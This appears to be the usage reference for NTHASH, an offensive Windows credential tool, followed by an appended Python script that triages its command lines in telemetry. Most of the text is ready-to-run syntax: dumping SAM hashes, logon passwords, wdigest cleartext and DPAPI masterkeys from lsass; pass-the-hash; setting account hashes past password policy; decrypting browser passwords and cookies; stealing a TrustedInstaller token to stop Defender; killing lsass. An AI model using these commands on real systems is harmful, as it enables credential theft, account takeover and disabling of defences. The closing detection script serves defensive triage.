Commands: setntlm, changentlm, getntlmhash, getsid, getusers, getdomains, dumpsam, dumphashes, getsamkey, getsyskey, dumpsecret, getlsakeys, wdigest, wdigeston, logonpasswords, pth, enumcred, enumcred2, enumvault, chrome, ccookies, firefox, fcookies, hexatostring, stringtohexa, widestringtohexa, filetohexa, hexatofile, base64encodew, base64encode, base64encodehexa, base64decode, base64decodehexa, getlsasecret, dpapimk, cryptunprotectdata, cryptprotectdata, decodeblob, decodemk, wlansvc, gethash, gethmac, getcipher, runasuser, runastoken, runaschild, runas, runts, enumpriv, enumproc, dumpproc, runwmi, context

### changentlm

changentlm uses a legacy API (SamiChangePasswordUser) and may not work if your NTLM hashes are encrypted with AES (i.e. starting with Windows 10 1607). Credit goes to https://github.com/vletoux/NTLMInjector.

```
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newhash:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newhash:xxx
```

### setntlm

setntlm, on the other hand, should always work (it uses SamSetInformationUser) and allows one to bypass the password policy. Credit goes to https://github.com/vletoux/NTLMInjector.

```
NTHASH /setntlm [/server:hostname] /user:username /newhash:xxx
NTHASH /setntlm [/server:hostname] /user:username /newpwd:xxx
```

### getntlmhash

getntlmhash will generate an NTLM hash. The undocumented Advapi32.dll function SystemFunction007 is used.

```
NTHASH /getntlmhash /password:password
echo password | nthash-win64 /getntlmhash | wtee output.ntlm
```

### getsid

getsid will provide the SID of a user.

```
NTHASH /getsid /user:username [/server:hostname]
```

### getusers

getusers will provide a list of users. The Samlib.dll SamEnumerateUsersInDomain function is used.

```
NTHASH /getusers [/server:hostname]
```

### getdomains

getdomains will provide a list of domains. The Samlib.dll SamEnumerateDomainsInSamServer function is used.
```
NTHASH /getdomains [/server:hostname]
```

### dumpsam

dumpsam will temporarily patch a module in lsass to be able to dump your SAM NTLM hashes from lsass memory (this still needs to be covered/tested on as many Windows versions as possible).

```
NTHASH /dumpsam
```

### dumphashes

dumphash and dumphashes will read the registry. You need to run as SYSTEM to perform this action, or you can use the /system switch. You can also perform this offline (and then no longer need to run as SYSTEM): use `reg save hklm\sam sam.sav` and `reg save hklm\system system.sav` to generate the offline hives. Both the RC4 (using advapi32.dll) and AES128 (using cryptoapi.dll) ciphers are supported. https://www.insecurity.be/blog/2018/01/21/retrieving-ntlm-hashes-and-what-changed-technical-writeup/ is a must read to understand RC4 vs AES.

```
NTHASH /dumphashes [/offline]
```

### getsamkey

getsamkey (also known as the hashed bootkey) will read/decrypt SAM\sam\Domains\account\F. Both the RC4 (using advapi32.dll) and AES128 (using cryptoapi.dll) ciphers are supported. The samkey is required by dumphashes.

```
NTHASH /getsamkey [/offline]
```

### getsyskey

getsyskey (also known as the bootkey) will read/decode the class attribute from SYSTEM\CurrentControlSet\Control\Lsa. The syskey is required to retrieve the samkey and for dumpsecret.

```
NTHASH /getsyskey [/offline]
```

### dumpsecret

dumpsecret will decrypt secrets (AES256 using cryptoapi.dll) from the registry (Security\Policy\secrets), online or offline. Use dumpsecret /input:dpapi_system to retrieve the DPAPI system keys (user and computer) needed to decrypt system masterkeys.

```
NTHASH /dumpsecret /input:secret [/offline]
NTHASH /dumpsecret /input:dpapi_system [/offline]
```

### getlsakeys

getlsakeys will read the LSA keys (AES, DES, IV) from lsass memory. These are required for logonpasswords, wdigest and dpapimk.

```
NTHASH /getlsakeys [/symbol]
```

### cryptunprotectdata / cryptprotectdata

cryptunprotectdata and cryptprotectdata will decrypt/encrypt data using DPAPI under the running user context (or the machine context, actually).
```
NTHASH /cryptunprotectdata /binary:filename [/hexa]
NTHASH /cryptunprotectdata /input:hexastring [/hexa]
NTHASH /cryptprotectdata /input:string
echo Passw0rd1234 | nthash-win64 /cryptprotectdata
```

### decodeblob

decodeblob will decode an encrypted DPAPI blob. If the decrypted masterkey is provided, it will also decrypt the blob and decode it. CryptDecrypt from cryptoapi is used. data.blob is the default filename.

```
NTHASH /decodeblob /binary:filename [/input:sha1MK]
```

### decodemk

decodemk will decode an encrypted DPAPI masterkey. If a pre-key is provided, it will also decrypt the masterkey and decode it. CryptDecrypt from cryptoapi is used.

```
NTHASH /decodemk /binary:filename [/input:hmachexastring] [/password:sha1pwdhexastring]
```

Example:

```
nthash-win64 /decodemk /binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\75380869-42A8-42EC-9E9B-8518F42802EE /password:01A612FE247D7DFCE7DAB432D5831A6474FFFFFF | nthash-win64 /decodeblob
```

or

```
NTHASH-win64.exe /gethmac /mode:SHA1 /key:01A612FE247D7DFCE7DAB432D5831A6474FFFFFF /input:53002D0031002D0035002D00320031002D0032003400320037003500310033003000380037002D0032003200360035003000320031003000300035002D0031003900360035003600350036003400350030002D0031003000300031000000 | nthash-win64 /decodemk
```

### wlansvc

wlansvc will decrypt a blob (contained in XML files) used by the wlansvc service. Find these XML files with `dir %programdata% /s /a /b | findstr /i interfaces`. Note that this data is encrypted/decrypted under the SYSTEM account. If it cannot decrypt it, it will dump the blob to blob.encrypted, which can then be used with decodeblob. cryptunprotectdata is used.

```
NTHASH /wlansvc /binary:filename
```

### gethash

gethash will hash a message. Supported hashes are SHA512, SHA256, SHA384, SHA1, MD5, MD4, MD2. CryptGetHashParam from cryptoapi is used. This function is used internally by many other crypt functions.

```
NTHASH /gethash /mode:hashid /input:hexabytes
```

### gethmac

gethmac will generate a keyed-hash message authentication code.
Supported hashes are SHA512, SHA256, SHA384, SHA1, MD5, MD4, MD2. CryptGetHashParam from cryptoapi is used. This function is used internally by many other crypt functions.

```
NTHASH /gethmac /mode:hashid /input:hexabytes /key:hexabytes
```

### getcipher

getcipher will encrypt a message with a key. Supported algorithms are RC2, RC4, RC5, DES, 3DES, 3DES112, AES, AES128, AES256. Supported hashes are SHA512, SHA256, SHA384, SHA1, MD5 (default), MD4, MD2. You can alter the cipher mode by setting the environment variable CRYPT_MODE to CBC, ECB (default), OFB, CFB or CTS. CryptEncrypt from cryptoapi is used.

```
NTHASH /getcipher /mode:cipherid /input:hexabytes /key:hexabytes
```

### getlsasecret

getlsasecret will retrieve LSA secrets using the LsaRetrievePrivateData API. Use getlsasecret /input:dpapi_system to retrieve the DPAPI system keys (user and computer) needed to decrypt system masterkeys.

```
NTHASH /getlsasecret /input:secret [/server:hostname]
NTHASH /getlsasecret /input:dpapi_system [/server:hostname]
```

### enumcred

enumcred will use the CredEnumerate Windows API to enumerate the logged-on user's credentials.

```
NTHASH /enumcred
```

### enumcred2

enumcred2 will use the CredEnumerate Windows API to enumerate the logged-on user's credentials while also patching lsass to dump all credentials.

```
NTHASH /enumcred2
```

### enumvault

enumvault will use the vaultcli.dll Windows API to enumerate the logged-on user's vault credentials.

```
NTHASH /enumvault
```

### chrome

chrome will decrypt Chrome browser passwords either online (using cryptunprotectdata) or offline (using decodeblob).

```
NTHASH /chrome [/binary:path_to_database] [/input:decryptedMK]
```

### ccookies

ccookies will decrypt Chrome browser cookies online (using cryptunprotectdata).

```
NTHASH /ccookies [/binary:path_to_database]
```

### firefox

firefox will decrypt Firefox browser passwords.

```
NTHASH /firefox [/binary:path_to_database]
```

### fcookies

fcookies will decrypt Firefox browser cookies.

```
NTHASH /fcookies [/binary:path_to_database]
```

### logonpasswords

logonpasswords will dump (from lsass memory) the lsasrv logon sessions' primary credentials (hashes) and credential manager entries (clear text).
Note that credentials are decrypted using the LSA keys and BcryptEncrypt from bcrypt32.dll.

```
NTHASH /logonpasswords [/symbol]
```

### pth

pth will create a suspended process with dummy credentials, dump the logon sessions, then patch the session matching the suspended process with the new credentials (NTLM hashed password). Note that credentials are encrypted using the LSA keys and BcryptEncrypt from bcrypt32.dll.

```
NTHASH /pth /user:username /password:myhash /domain:mydomain [/symbol]
```

### wdigest

wdigest will dump (from lsass memory) the wdigest session credentials (clear text).

```
NTHASH /wdigest [/symbol]
```

### wdigeston

wdigeston will re-enable wdigest by patching lsass.exe.

```
NTHASH /wdigeston [/symbol]
```

### dpapimk

dpapimk will dump (from lsass memory) the decrypted DPAPI masterkeys. Note that credentials are decrypted using the LSA keys and BcryptEncrypt from bcrypt32.dll.

```
NTHASH /dpapimk [/symbol]
```

### runasuser

runasuser will simply run a process with the provided cleartext credentials, similar to the Windows runas command.

```
NTHASH /runasuser /user:username /password:password [/binary: x:\folder\bin.exe]
```

### runastoken

runastoken can be used to run a process under a system account. Once under a system account, you can also "steal" a token from trustedinstaller (run `net start trustedinstaller` beforehand). Note that you can steal a trustedinstaller token directly by using the /system switch. With a trustedinstaller token you can perform actions like stopping windefend (or killing the process, modifying the AV settings, etc.). See the example below, where you start the trustedinstaller service, retrieve its PID and run a process as that account.

```
@echo off
net start trustedinstaller
for /F "tokens=1" %%K in ('nthash-win64 /enumproc ^| findstr /i "trustedinstaller"') do (
    nthash-win64 /runastoken /pid:%%K /system
)
```

```
NTHASH /runastoken /pid:12345 [/binary: x:\folder\bin.exe]
NTHASH-win64 /enumproc /input:trustedinstaller.exe | nthash-win64 /runastoken /system
```

### runaschild

runaschild can be used to run a process as a child of another existing (parent) process.
Note that some apps (like cmd.exe) will crash right after initialization with a c0000142. Weirdly enough, loading notepad.exe with this method and then launching cmd.exe from there works...

```
NTHASH /runaschild /pid:12345 [/binary: x:\folder\bin.exe]
```

### runas

runas will launch a process in elevated mode. That command should actually be renamed runaselevated.

```
NTHASH /runas [/binary: x:\folder\bin.exe]
```

### runts

runts will launch a process in the context of another TS session. Note that this one needs SeTcbPrivilege, so you will have to find a token with such a privilege first (like winlogon.exe).

```
NTHASH /runts /user:session_id [/binary: x:\folder\bin.exe]
```

### runwmi

runwmi will launch a process using WMI, locally or remotely.

```
NTHASH /runwmi /binary: x:\folder\bin.exe [/server:hostname]
```

### context

context will display various information such as the Windows platform, version, elevated y/n, debugprivilege y/n, admin y/n, ...

```
NTHASH /context
```

### enumpriv

enumpriv will list all privileges, enabled or not. Will possibly be used later on in batch mode.

```
NTHASH /enumpriv
```

### enumproc

enumproc will list (all, depending on the context) processes with the logged-on user. It is used in the trusted.cmd batch.

```
NTHASH /enumproc [/input:some.exe]
echo lsass.exe | nthash-win64 /enumproc | nthash-win64 /killproc
```

### dumpproc

dumpproc will dump a process (similar to procdump). In the future, it should ideally use syscalls to avoid AV/EDR.

```
NTHASH /dumpproc /pid:12345
```

### hexatostring

hexatostring will convert hexadecimal to a string.

```
NTHASH /hexatostring /input:hexabytes
```

### stringtohexa

stringtohexa will convert a string to hexadecimal.

```
NTHASH /stringtohexa /input:string
echo password | NTHASH-win64.exe /stringtohexa | NTHASH-win64.exe /gethash /mode:MD5 | wtee output.md5
```

### widestringtohexa

widestringtohexa will convert a string to Unicode hexadecimal.

```
NTHASH /widestringtohexa /input:string
```

### filetohexa

filetohexa will convert file content to hexadecimal. data.blob is the default filename.

```
NTHASH /filetohexa [/binary:filename]
```
```
nthash-win64 /filetohexa | nthash-win64 /base64encodehexa | wtee output.base64
```

### hexatofile

hexatofile will convert hexadecimal to a file. data.blob is the default filename.

```
NTHASH /hexatofile /input:hexabytes [/binary:filename]
```

### base64encodew

base64encodew will convert a string to Unicode base64.

```
NTHASH /base64encodew /input:string
```

### base64encode

base64encode will convert a string to base64.

```
NTHASH /base64encode /input:string
echo password | nthash-win64 /base64encode | wtee output.base64
```

### base64encodehexa

base64encodehexa will convert a hexa string to base64.

```
NTHASH /base64encodehexa /input:hexastring
```

### base64decode

base64decode will convert a base64 string to a string.

```
NTHASH /base64decode /input:base64string
echo cGFzc3dvcmQg | nthash-win64 /base64decode
type output.base64 | nthash-win64 /base64decode
```

### base64decodehexa

base64decodehexa will convert a base64 string to a hexa string.

```
NTHASH /base64decodehexa /input:base64string
type output.base64 | nthash-win64 /base64decodehexa
```
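As an added defensive example (not part of NTHASH and not the author's code), the script below parses the `/command /switch:value` syntax used throughout this reference, including the `/binary: x:\path` form with a space after the colon, and ranks process-creation command lines that invoke the tool by what the command touches (lsass memory, credential stores, tokens, account changes). The sample command lines, the hostname FILESRV01 and the PID are constructed.

```python
"""Triage nthash-win64 calls seen in process-creation command lines (added example, not
NTHASH project code): parse the documented /command /switch:value syntax, rank events."""
import re
import shlex
CATEGORIES = [  # command groups follow the reference above
    ("lsass-memory", {"dumpsam", "getlsakeys", "logonpasswords", "pth", "wdigest",
                      "wdigeston", "dpapimk", "enumcred2", "dumpproc"}, "high"),
    ("secrets", {"dumphash", "dumphashes", "getsamkey", "getsyskey", "dumpsecret",
                 "getlsasecret", "enumcred", "enumvault", "wlansvc", "chrome",
                 "ccookies", "firefox", "fcookies", "decodemk", "decodeblob"}, "high"),
    ("account-change", {"setntlm", "changentlm"}, "high"),
    ("token", {"runasuser", "runastoken", "runaschild", "runas", "runts", "runwmi"}, "medium"),
]
SWITCH_RE = re.compile(r"^/([A-Za-z0-9]+)(?::(.*))?$")
def parse_cmdline(cmdline):
    """Return (image basename, [(switch, value or None), ...]) for a command line."""
    try:  # posix=False keeps backslashes in Windows paths literal
        tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)] or [""]
    except ValueError:  # unbalanced quotes: fall back to a plain whitespace split
        tokens = [t.strip('"') for t in cmdline.split()] or [""]
    image, switches, i = tokens[0].rsplit("\\", 1)[-1].lower(), [], 1
    while i < len(tokens):
        m = SWITCH_RE.match(tokens[i])
        if m:
            name, value = m.group(1).lower(), m.group(2)
            # "/binary: x:\path" form used in the reference: the value follows a space
            if value == "" and i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                i, value = i + 1, tokens[i + 1]
            switches.append((name, value))
        i += 1
    return image, switches

def triage(cmdline):
    """Return a triage record for an nthash call, or None for any other process."""
    image, switches = parse_cmdline(cmdline)
    if not image.startswith("nthash") or not switches:
        return None
    command, opts = switches[0][0], dict(switches[1:])
    category, severity = "utility", "low"  # hex/base64 helpers, context, enumpriv, ...
    for name, members, level in CATEGORIES:
        if command in members:
            category, severity = name, level
    return {"command": command, "category": category, "severity": severity,
            "remote": "server" in opts, "switches": opts}

SAMPLE_EVENTS = [  # constructed sample events, not real telemetry
    r'"C:\Tools\nthash-win64.exe" /dumpsam', r'notepad.exe C:\notes.txt',
    r'nthash-win64 /runastoken /pid:4321 /binary: C:\Windows\System32\cmd.exe',
    r'nthash-win64 /getlsasecret /input:dpapi_system /server:FILESRV01']
RECORDS = [r for r in map(triage, SAMPLE_EVENTS) if r]  # the three nthash calls
```

Pipelines such as `echo password | nthash-win64 /getntlmhash` appear in telemetry as a separate process whose image is nthash-win64, so the same parser applies to each process-creation event individually.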